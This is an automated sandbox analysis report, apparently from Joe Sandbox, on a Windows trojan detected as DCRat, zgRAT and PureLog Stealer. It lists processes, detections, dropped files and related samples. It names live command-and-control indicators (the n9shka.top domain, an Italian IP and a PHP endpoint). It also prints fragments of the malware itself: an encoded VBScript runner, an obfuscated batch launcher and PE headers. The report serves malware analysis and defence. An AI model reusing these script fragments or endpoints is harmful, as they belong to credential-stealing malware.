                                    • Delphi
                                    • Java
                                    • .Net C# or VB.NET
                                    • C, C++ or other language
                                    • Is malicious
                                    • Internet
                                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1507297 Sample: kIdT4m0aa4.exe Startdate: 08/09/2024 Architecture: WINDOWS Score: 100 64 304550cm.n9shka.top 2->64 68 Suricata IDS alerts for network traffic 2->68 70 Antivirus detection for URL or domain 2->70 72 Antivirus detection for dropped file 2->72 74 11 other signatures 2->74 11 kIdT4m0aa4.exe 3 6 2->11         started        14 OpenWith.exe 2->14         started        16 services.exe 2->16         started        signatures3 process4 file5 58 C:\ProviderWebSavesNet\hostcrt.exe, PE32 11->58 dropped 60 KzpapvVcbVWl7x3kYP...jKXptfYw4GAjwTs.vbe, data 11->60 dropped 18 wscript.exe 1 11->18         started        process6 signatures7 66 Windows Scripting host queries suspicious COM object (likely to drop second stage) 18->66 21 cmd.exe 1 18->21         started        process8 process9 23 hostcrt.exe 3 43 21->23         started        27 conhost.exe 21->27         started        file10 50 C:\Windows\Media\Characters\conhost.exe, PE32 23->50 dropped 52 C:\Users\user\Desktop\vOZlGrCu.log, PE32 23->52 dropped 54 C:\Users\user\Desktop\vGpScIbo.log, PE32 23->54 dropped 56 30 other malicious files 23->56 dropped 76 Antivirus detection for dropped file 23->76 78 Machine Learning detection for dropped file 23->78 80 Drops PE files to the startup folder 23->80 82 Drops PE files with benign system names 23->82 29 cmd.exe 1 23->29         started        signatures11 process12 signatures13 84 Uses ping.exe to sleep 29->84 86 Uses ping.exe to check the status of other devices and networks 29->86 32 COBPewMCbcSeQUSyEIOt.exe 14 29 29->32         started        36 conhost.exe 29->36         started        38 PING.EXE 1 29->38         started        40 chcp.com 1 29->40         started        process14 dnsIp15 62 304550cm.n9shka.top 80.211.144.156, 49738, 49739, 49741 ARUBA-ASNIT Italy 32->62 42 C:\Users\user\Desktop\zLibuNkF.log, PE32 32->42 dropped 44 C:\Users\user\Desktop\tyuuQYhQ.log, PE32 32->44 dropped 46 C:\Users\user\Desktop\tTFBRhfQ.log, PE32 32->46 dropped 48 24 other malicious files 32->48 dropped file16

                                    Screenshots

                                    Thumbnails

                                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                    windows-stand

                                    Antivirus, Machine Learning and Genetic Malware Detection

                                    Initial Sample

                                    SourceDetectionScannerLabelLink
                                    kIdT4m0aa4.exe100%AviraVBS/Runner.VPG
                                    kIdT4m0aa4.exe100%Joe Sandbox ML

                                    Dropped Files

                                    SourceDetectionScannerLabelLink
                                    C:\Users\user\Desktop\TLuxYJBs.log100%AviraHEUR/AGEN.1300079
                                    C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe100%AviraHEUR/AGEN.1323342
                                    C:\Users\user\AppData\Local\Temp\4sBxboqxXs.bat100%AviraBAT/Delbat.C
                                    C:\ProviderWebSavesNet\KzpapvVcbVWl7x3kYPCfes0ojKXptfYw4GAjwTs.vbe100%AviraVBS/Runner.VPG
                                    C:\Users\user\Desktop\GcNqxydU.log100%AviraHEUR/AGEN.1300079
                                    C:\ProviderWebSavesNet\hostcrt.exe100%AviraHEUR/AGEN.1323342
                                    C:\Users\user\Desktop\BpvsVBNg.log100%AviraTR/PSW.Agent.qngqt
                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exe100%AviraHEUR/AGEN.1323342
                                    C:\Users\user\Desktop\FxsAqTHc.log100%AviraHEUR/AGEN.1300079
                                    C:\Users\user\Desktop\IuBreppm.log100%AviraHEUR/AGEN.1300079
                                    C:\Users\user\Desktop\OwCQqHNY.log100%AviraHEUR/AGEN.1300079
                                    C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe100%AviraHEUR/AGEN.1323342
                                    C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe100%AviraHEUR/AGEN.1323342
                                    C:\Users\user\Desktop\TLuxYJBs.log100%Joe Sandbox ML
                                    C:\Users\user\Desktop\ILIJsLjp.log100%Joe Sandbox ML
                                    C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe100%Joe Sandbox ML
                                    C:\Users\user\Desktop\JrdzzpEh.log100%Joe Sandbox ML
                                    C:\Users\user\Desktop\GcNqxydU.log100%Joe Sandbox ML
                                    C:\Users\user\Desktop\BOUJPwoA.log100%Joe Sandbox ML
                                    C:\ProviderWebSavesNet\hostcrt.exe100%Joe Sandbox ML
                                    C:\Users\user\Desktop\BpvsVBNg.log100%Joe Sandbox ML
                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exe100%Joe Sandbox ML
                                    C:\Users\user\Desktop\RIIODaxx.log100%Joe Sandbox ML
                                    C:\Users\user\Desktop\FxsAqTHc.log100%Joe Sandbox ML
                                    C:\Users\user\Desktop\OwCQqHNY.log100%Joe Sandbox ML
                                    C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe100%Joe Sandbox ML
                                    C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe100%Joe Sandbox ML

                                    Unpacked PE Files

                                    No Antivirus matches

                                    Domains

                                    No Antivirus matches

                                    URLs

                                    SourceDetectionScannerLabelLink
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                                    http://304550cm.n9shka.top100%Avira URL Cloudmalware
                                    http://304550cm.n9shka.top/100%Avira URL Cloudmalware
                                    http://304550cm.n9shka.top/jspollgamesqldle.php100%Avira URL Cloudmalware
                                    http://304550cm.n9P:0%Avira URL Cloudsafe

                                    Domains and IPs

                                    Contacted Domains

                                    NameIPActiveMaliciousAntivirus DetectionReputation
                                    304550cm.n9shka.top
                                    		80.211.144.156
                                    		truetrue
                                      		unknown

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      http://304550cm.n9shka.top/jspollgamesqldle.phptrue
                                      • Avira URL Cloud: malware
                                      		unknown

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      http://304550cm.n9shka.topCOBPewMCbcSeQUSyEIOt.exe, 0000000B.00000002.4164385410.0000000003385000.00000004.00000800.00020000.00000000.sdmp, COBPewMCbcSeQUSyEIOt.exe, 0000000B.00000002.4164385410.00000000031FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://304550cm.n9shka.top/COBPewMCbcSeQUSyEIOt.exe, 0000000B.00000002.4164385410.0000000002F22000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namehostcrt.exe, 00000004.00000002.1793730163.0000000003108000.00000004.00000800.00020000.00000000.sdmp, COBPewMCbcSeQUSyEIOt.exe, 0000000B.00000002.4164385410.0000000003071000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://304550cm.n9P:COBPewMCbcSeQUSyEIOt.exe, 0000000B.00000002.4164385410.0000000003385000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown

                                      World Map of Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public IPs

                                      IPDomainCountryFlagASNASN NameMalicious
                                      80.211.144.156
                                      		304550cm.n9shka.topItaly
                                      		31034ARUBA-ASNITtrue

                                      General Information

                                      Joe Sandbox version:40.0.0 Tourmaline
                                      Analysis ID:1507297
                                      Start date and time:2024-09-08 11:50:50 +02:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 11m 36s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:19
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:kIdT4m0aa4.exe
                                      renamed because original name is a hash value
                                      Original Sample Name:55A2312D6062E5BAC6C5F62A0EE42FA2.exe
                                      Detection:MAL
                                      Classification:mal100.troj.adwa.evad.winEXE@20/72@1/1
                                      EGA Information:
                                      • Successful, ratio: 75%
                                      HCA Information:Failed
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Override analysis time to 240000 for current running targets taking high CPU consumption

                                      Warnings

                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                      • Excluded IPs from analysis (whitelisted): 184.28.90.27
                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, 6.0.1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.0.3.0.1.3.0.6.2.ip6.arpa, slscr.update.microsoft.com, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                                      • Execution Graph export aborted for target services.exe, PID 4588 because it is empty
                                      • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • VT rate limit hit for: kIdT4m0aa4.exe

                                      Simulations

                                      Behavior and APIs

                                      TimeTypeDescription
                                      05:52:04API Interceptor1x Sleep call for process: OpenWith.exe modified
                                      05:52:08API Interceptor12393852x Sleep call for process: COBPewMCbcSeQUSyEIOt.exe modified
                                      10:51:55AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c5b4cb5e9653cc
                                      10:52:03AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exe

                                      Joe Sandbox View / Context

                                      IPs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      80.211.144.1567buiOqC9uM.exeGet hashmaliciousDCRatBrowse
                                      • 545735cm.n9shteam2.top/PhpgeoupdateprocessorsqlTemporary.php
                                      5R28W1PAnS.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                      • 917166cm.n9shka.top/eternalJavascriptSecureCpuBigloadserverDefaultlinuxwordpress.php
                                      YhyZwI1Upd.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                      • gugol.top/PipeCpuauthgameDefault.php
                                      6KZExx4zr6.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                      • moscowteslaclub.top/LinemultiLinux.php
                                      U22myB552e.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                      • 692143cm.n9shka.top/VideoPythonphpsecureprocessorwindowsDleTemporary.php
                                      active key.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                      • 128538cm.n9shteam3.top/VmPipepacketupdateflowerAsyncDatalifeTempuploads.php
                                      iwtYgAXvKB.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                      • 951499cm.nyashtech.top/sqlcentralUploads.php
                                      cuAvoExY41.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                      • hvatit.top/dbwp.php
                                      rRNxo8cmA3.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                      • 222725cm.n9shka.top/vmjavascriptUpdateprotectlinuxWppublicTemp.php
                                      9i0GfIAfU7.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                      • 334972cm.n9shka.top/PhpPacketlowProcessGameprotectprivatecentral.php

                                      Domains

                                      No context

                                      ASNs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      ARUBA-ASNIT7buiOqC9uM.exeGet hashmaliciousDCRatBrowse
                                      • 80.211.144.156
                                      https://www.nexelsrl.it/wp-admin/js/GMX-00004/Get hashmaliciousUnknownBrowse
                                      • 31.11.35.137
                                      https://www.collomici.it/Orcia.htmlGet hashmaliciousUnknownBrowse
                                      • 31.11.35.172
                                      5R28W1PAnS.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                      • 80.211.144.156
                                      YhyZwI1Upd.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                      • 80.211.144.156
                                      firmware.sh4.elfGet hashmaliciousUnknownBrowse
                                      • 80.88.85.16
                                      SecuriteInfo.com.Script.SNH-gen.5224.29912.exeGet hashmaliciousFormBookBrowse
                                      • 62.149.128.45
                                      6KZExx4zr6.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                      • 80.211.144.156
                                      avanss.exeGet hashmaliciousAgentTeslaBrowse
                                      • 62.149.156.218
                                      FATT. N. 2563 DEL 30.08.2024 Antincendi Marche S.r.l..exeGet hashmaliciousAgentTeslaBrowse
                                      • 62.149.128.218

                                      JA3 Fingerprints

                                      No context

                                      Dropped Files

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      C:\Users\user\Desktop\AfbbeRiC.log5R28W1PAnS.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                        iqA8j9yGcd.exeGet hashmaliciousHackBrowser, DCRat, Discord Token Stealer, Millenuim RAT, PureLog Stealer, zgRATBrowse
                                          TwfUz3FuO7.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                            z3yAH0LL5e.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                              BUKHuBek8M.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                Componentsession.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                  -#U00bc).exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                    Loader.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                      SpotifyStartupTask2.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                        R6ZdHnUZee.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse

                                                          Created / dropped Files

                                                          C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe

                                                          Download File
                                                          Process:C:\ProviderWebSavesNet\hostcrt.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3879424
                                                          Entropy (8bit):7.837347017475398
                                                          Encrypted:false
                                                          SSDEEP:98304:wxy6buzFyyqatrjLQsf10YsOR+iI5XEcP8:wxmR4atrYsNdx3I5Xs
                                                          MD5:88340879F7B502B0EEE8F6147CDC70EB
                                                          SHA1:1510660A130FDCB57E2DCAD37C16CF1A966126D8
                                                          SHA-256:BCEFEDADA15B81B6470D80824651DAC64D52A568B459B6C1ADE8D0DCDDCF2F05
                                                          SHA-512:D3518EB922315743BF16624E256A6BCC4B930723786CF34CCB40AFB901C2EDE1A19C0ACDB21EE4C5BBDA6541A2B229C16A8AD66E861230E46634F30B8D3DB3ED
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Reputation:low
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................*;..........I;.. ...`;...@.. ........................;...........@.................................PI;.K....`;.p.....................;...................................................... ............... ..H............text....);.. ...*;................. ..`.rsrc...p....`;......,;.............@....reloc........;......0;.............@..B.................I;.....H.......8...|.......y........l0..H;......................................0..........(.... ........8........E....M...N.......)...8H...(.... ....~....{p...9....& ....8....(.... ....~....{....:....& ....8....*(.... ....8........0.......... ........8........E....................F...8........~....(T...~....(X... ....?u... ....~....{....:....& ....8....~....(L... .... .... ....s....~....(P....... ....~....{....:a...& ....8V...r...ps....z*~....:.... ....~....{....:,...& ....8!......

                                                          C:\Program Files\Microsoft\d1eeccb3e1a73c

                                                          Download File
                                                          Process:C:\ProviderWebSavesNet\hostcrt.exe
                                                          File Type:ASCII text, with very long lines (308), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):308
                                                          Entropy (8bit):5.785984719734551
                                                          Encrypted:false
                                                          SSDEEP:6:n7qqcJArfstqaNtKW5J9w+K01jehj1c+OOldo1TMKYSxE5ZgNvmaQLVsX/:nO8fiNtH79401jevWO3o1TaS25gma9P
                                                          MD5:4E5BB8BF4570A280F07A2BFB9EE07D98
                                                          SHA1:9616CB7554ACBD50F91988068A0EF5BD768E4FF1
                                                          SHA-256:F9C52FE1905182E2DAAF1DFC5C1F8C3212740EAEA712B8EE366D13C5CAAE8EDA
                                                          SHA-512:131D998712F7C223FC86F58F07F87A076F755359EDB162A9599F56F863B5FC284126A28E4F3998271D26F81FF91E87F0998FA6A8B0572EEA76FB655C8B17D01B
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:66wM2GTJGbMwniSxfOU97LllTix5cC414QAMgf05DgMr2x2bbc5z1NVuUK2USYqEgU1WhGR9XZ5b84sgpWeAGFAq4P1VngmpzILi6f4VL6cbS4vacWo64q7bUKbRO6W1wPl0sKkKcIzKmiYAda2Q1qvJKtNvDmGOjkpDS5sRwedv1xyvwbxyDFAGdcq96yGzCkkC3VrisleWMASX4b9mySLekij0OsV7YotRMw2buOFckn3dKSFezeAtYGbUv0T9Ph8iRBKHjh1jMt36pFq5n0H4n92GUip34GMDpVLJI75RmbgpNfpq

                                                          C:\ProviderWebSavesNet\4m3MAufDe8UYuW2ydRhKZQEREfiJBHvyHq5AIcSjywzlT6BxOyJV1br81hHR.bat

                                                          Download File
                                                          Process:C:\Users\user\Desktop\kIdT4m0aa4.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):82
                                                          Entropy (8bit):5.218721785285712
                                                          Encrypted:false
                                                          SSDEEP:3:/DsvAJHyTXV4TXIlyrWUsNKht+rIdYsAn:gvAtiTlyrWUsKwId3A
                                                          MD5:22B3050E40CCED02D2A2149A4FF4C740
                                                          SHA1:BBF5353903FECF327FEFED64EA5682AA62AE6D3B
                                                          SHA-256:279A77EFF83AEAD5BC84AE074B51E9D31B582822E581AD09B96901C52C8FAD5C
                                                          SHA-512:3D2CA66D370E10BC13DBCC84145CC11BD524853FFC9E493BE7AC26A0DCFB7253DD76DEF55CA3DE2B4C493BE412287F49DA9AA074CD3CC13C072E2D7F0DDAC59C
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:%LGfKiTOKd%%YUwkBls%..%SnFpq%"C:\ProviderWebSavesNet/hostcrt.exe"%mpVsRNBRVqxszbi%

                                                          C:\ProviderWebSavesNet\COBPewMCbcSeQUSyEIOt.exe

                                                          Download File
                                                          Process:C:\ProviderWebSavesNet\hostcrt.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3879424
                                                          Entropy (8bit):7.837347017475398
                                                          Encrypted:false
                                                          SSDEEP:98304:wxy6buzFyyqatrjLQsf10YsOR+iI5XEcP8:wxmR4atrYsNdx3I5Xs
                                                          MD5:88340879F7B502B0EEE8F6147CDC70EB
                                                          SHA1:1510660A130FDCB57E2DCAD37C16CF1A966126D8
                                                          SHA-256:BCEFEDADA15B81B6470D80824651DAC64D52A568B459B6C1ADE8D0DCDDCF2F05
                                                          SHA-512:D3518EB922315743BF16624E256A6BCC4B930723786CF34CCB40AFB901C2EDE1A19C0ACDB21EE4C5BBDA6541A2B229C16A8AD66E861230E46634F30B8D3DB3ED
                                                          Malicious:true
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................*;..........I;.. ...`;...@.. ........................;...........@.................................PI;.K....`;.p.....................;...................................................... ............... ..H............text....);.. ...*;................. ..`.rsrc...p....`;......,;.............@....reloc........;......0;.............@..B.................I;.....H.......8...|.......y........l0..H;......................................0..........(.... ........8........E....M...N.......)...8H...(.... ....~....{p...9....& ....8....(.... ....~....{....:....& ....8....*(.... ....8........0.......... ........8........E....................F...8........~....(T...~....(X... ....?u... ....~....{....:....& ....8....~....(L... .... .... ....s....~....(P....... ....~....{....:a...& ....8V...r...ps....z*~....:.... ....~....{....:,...& ....8!......

                                                          C:\ProviderWebSavesNet\KzpapvVcbVWl7x3kYPCfes0ojKXptfYw4GAjwTs.vbe

                                                          Download File
                                                          Process:C:\Users\user\Desktop\kIdT4m0aa4.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):257
                                                          Entropy (8bit):5.968078709504006
                                                          Encrypted:false
                                                          SSDEEP:6:GHwqK+NkLzWbHK/818nZNDd3RL1wQJRWyO6y/+lOIh4Ptdz/t7:GuMCzWLKG4d3XBJ26yuOblh9
                                                          MD5:2DA89FB4C9E3DBDB93495A409F2C4174
                                                          SHA1:D22186A88E8EBE609DAD2EC8F0BB39DF314114C7
                                                          SHA-256:4E65E9DF887312CFBF2CAFC4A309ECA1DC4204F2F87B9A6ED20D37EB94F15C9A
                                                          SHA-512:5AA9F1D004C92C4B6FF7428CC24AAAEB5F04E668657904DD123DD1CA129C6B81C37D5EFA7AA746AEC52DB56417DA8038001EBF229EF5E2E61E12423B3B45B6B1
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          Preview:#@~^6AAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2vvT!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~J;lJn.K\bN+M..8?m\n/g+O&Jc:2\b!0f.0i5!.yX[I4F\p3IAWkxAu-HC;X)&mjLHA.VP+AXrXx.88DRF4C"R8CDJ~,T~,0l^dnrUoAAA==^#~@.

                                                          C:\ProviderWebSavesNet\d1eeccb3e1a73c

                                                          Download File
                                                          Process:C:\ProviderWebSavesNet\hostcrt.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):78
                                                          Entropy (8bit):5.288294045646641
                                                          Encrypted:false
                                                          SSDEEP:3:5hHqfdbo/WHZ0SOqqRt+1m:/K1boeaS2m1m
                                                          MD5:42734F088B6C99129DDD09A748286816
                                                          SHA1:ECEABD33147E36F3ED876B126834627A3686C35D
                                                          SHA-256:F68BFF17DF311B1F8FAB09B40A8A537A6C1EE629FF18C894C5CA973CDA853D09
                                                          SHA-512:3964F39B019B90AAF8DB926B9CFB6B5D6FABAFB2BCB3AE06947FDB2B5E574CED4B99AFFD16590DF340E1149F5D5F945CD6597A34CB8A3C9E8C1E2CE3703858BB
                                                          Malicious:false
                                                          Preview:4SIDwA28oGgzRU4hxq40RMcM3z39tguxoka3AEK4ZowaIXNUvnkpejwsz6K6H2PHWtLq3Agsf9anaC

                                                          C:\ProviderWebSavesNet\hostcrt.exe

                                                          Download File
                                                          Process:C:\Users\user\Desktop\kIdT4m0aa4.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3879424
                                                          Entropy (8bit):7.837347017475398
                                                          Encrypted:false
                                                          SSDEEP:98304:wxy6buzFyyqatrjLQsf10YsOR+iI5XEcP8:wxmR4atrYsNdx3I5Xs
                                                          MD5:88340879F7B502B0EEE8F6147CDC70EB
                                                          SHA1:1510660A130FDCB57E2DCAD37C16CF1A966126D8
                                                          SHA-256:BCEFEDADA15B81B6470D80824651DAC64D52A568B459B6C1ADE8D0DCDDCF2F05
                                                          SHA-512:D3518EB922315743BF16624E256A6BCC4B930723786CF34CCB40AFB901C2EDE1A19C0ACDB21EE4C5BBDA6541A2B229C16A8AD66E861230E46634F30B8D3DB3ED
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ProviderWebSavesNet\hostcrt.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ProviderWebSavesNet\hostcrt.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................*;..........I;.. ...`;...@.. ........................;...........@.................................PI;.K....`;.p.....................;...................................................... ............... ..H............text....);.. ...*;................. ..`.rsrc...p....`;......,;.............@....reloc........;......0;.............@..B.................I;.....H.......8...|.......y........l0..H;......................................0..........(.... ........8........E....M...N.......)...8H...(.... ....~....{p...9....& ....8....(.... ....~....{....:....& ....8....*(.... ....8........0.......... ........8........E....................F...8........~....(T...~....(X... ....?u... ....~....{....:....& ....8....~....(L... .... .... ....s....~....(P....... ....~....{....:a...& ....8V...r...ps....z*~....:.... ....~....{....:,...& ....8!......

                                                          C:\Recovery\COBPewMCbcSeQUSyEIOt.exe

                                                          Download File
                                                          Process:C:\ProviderWebSavesNet\hostcrt.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3879424
                                                          Entropy (8bit):7.837347017475398
                                                          Encrypted:false
                                                          SSDEEP:98304:wxy6buzFyyqatrjLQsf10YsOR+iI5XEcP8:wxmR4atrYsNdx3I5Xs
                                                          MD5:88340879F7B502B0EEE8F6147CDC70EB
                                                          SHA1:1510660A130FDCB57E2DCAD37C16CF1A966126D8
                                                          SHA-256:BCEFEDADA15B81B6470D80824651DAC64D52A568B459B6C1ADE8D0DCDDCF2F05
                                                          SHA-512:D3518EB922315743BF16624E256A6BCC4B930723786CF34CCB40AFB901C2EDE1A19C0ACDB21EE4C5BBDA6541A2B229C16A8AD66E861230E46634F30B8D3DB3ED
                                                          Malicious:true
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................*;..........I;.. ...`;...@.. ........................;...........@.................................PI;.K....`;.p.....................;...................................................... ............... ..H............text....);.. ...*;................. ..`.rsrc...p....`;......,;.............@....reloc........;......0;.............@..B.................I;.....H.......8...|.......y........l0..H;......................................0..........(.... ........8........E....M...N.......)...8H...(.... ....~....{p...9....& ....8....(.... ....~....{....:....& ....8....*(.... ....8........0.......... ........8........E....................F...8........~....(T...~....(X... ....?u... ....~....{....:....& ....8....~....(L... .... .... ....s....~....(P....... ....~....{....:a...& ....8V...r...ps....z*~....:.... ....~....{....:,...& ....8!......

                                                          C:\Recovery\d1eeccb3e1a73c

                                                          Download File
                                                          Process:C:\ProviderWebSavesNet\hostcrt.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):104
                                                          Entropy (8bit):5.2974262277734505
                                                          Encrypted:false
                                                          SSDEEP:3:Xj9i/nl6Xdpjj4WMcf/3KnLlbYkwZzr:zc8XjpX3KnJYkwNr
                                                          MD5:E22DFFA4DB79C8E952102D1FE8CA0F88
                                                          SHA1:7E943C65C06742D8BDA2827E35048E2373FE0EE3
                                                          SHA-256:5FE650F1DF04A710A465B16E3171CD13A61D03E44185C9C73C989C8903A15F5B
                                                          SHA-512:E3C18C72B1C0156369EE17F2EC67491E4E8860F706C4F1FD1EDD268A8A1DA7A45BC3B031164D55E6FBDBC3D1F80ABEC59FBF5EE81EC3A205DD8F6EA982CBDE11
                                                          Malicious:false
                                                          Preview:6ESFyrEE4NxgZoDZMhbvG2KeIISx2nVjpJLSaF2M6bxRM3Ow8oTEHb9E3x6pZRMR2N1Pcv8GpOzoE3SP4fyOTQcNKHYnJMwoPgY8B8TN

                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\hostcrt.exe.log

                                                          Download File
                                                          Process:C:\ProviderWebSavesNet\hostcrt.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:modified
                                                          Size (bytes):1698
                                                          Entropy (8bit):5.367720686892084
                                                          Encrypted:false
